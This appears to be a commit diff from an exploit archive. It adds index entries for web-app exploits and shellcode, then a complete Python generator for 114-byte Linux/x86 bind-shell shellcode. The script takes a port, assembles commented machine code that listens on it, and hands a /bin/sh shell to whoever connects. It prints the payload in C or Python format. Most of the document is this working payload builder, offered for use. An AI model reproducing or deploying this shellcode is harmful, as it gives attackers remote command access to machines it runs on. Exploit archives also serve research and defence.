6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42323,3 +42330,5 @@ id,file,description,date,author,type,platform,port
48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,
48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple,
48030,exploits/php/webapps/48030.txt,"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,



@ -1014,3 +1014,4 @@ id,file,description,date,author,type,platform
47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux

1 id file description date author type platform
1014 47890 shellcodes/linux/47890.c Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) 2020-01-08 Xenofon Vassilakopoulos shellcode linux
1015 47953 shellcodes/windows/47953.c Windows/7 - Screen Lock Shellcode (9 bytes) 2020-01-22 Saswat Nayak shellcode windows
1016 47980 shellcodes/windows/47980.txt Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) 2020-01-30 boku shellcode windows
1017 48032 shellcodes/linux/48032.py Linux/x86 - Bind Shell Generator Shellcode (114 bytes) 2020-02-10 boku shellcode linux

147
shellcodes/linux/48032.py Executable file

@ -0,0 +1,147 @@
# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386
#!/usr/bin/python
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
hexPort = "0" + hexPort
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
nullCheck = deciPort % 256
if nullCheck == 0 :
print "Your TCP Port contains a Null 0x00."
print "Try again with a different Port Number."
exit(0)
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
# ; Allowing us to create connected Sockets.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
shellcode += '\\x'
shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
shellcode += '\\x'
shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
if exportFormat == "2" :
formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[-----------------------Your-Shellcode------------------------]"
print 'shellcode = "'+formatSC+'"'
else :
formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[----------------Your-Shellcode------------------]"
print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'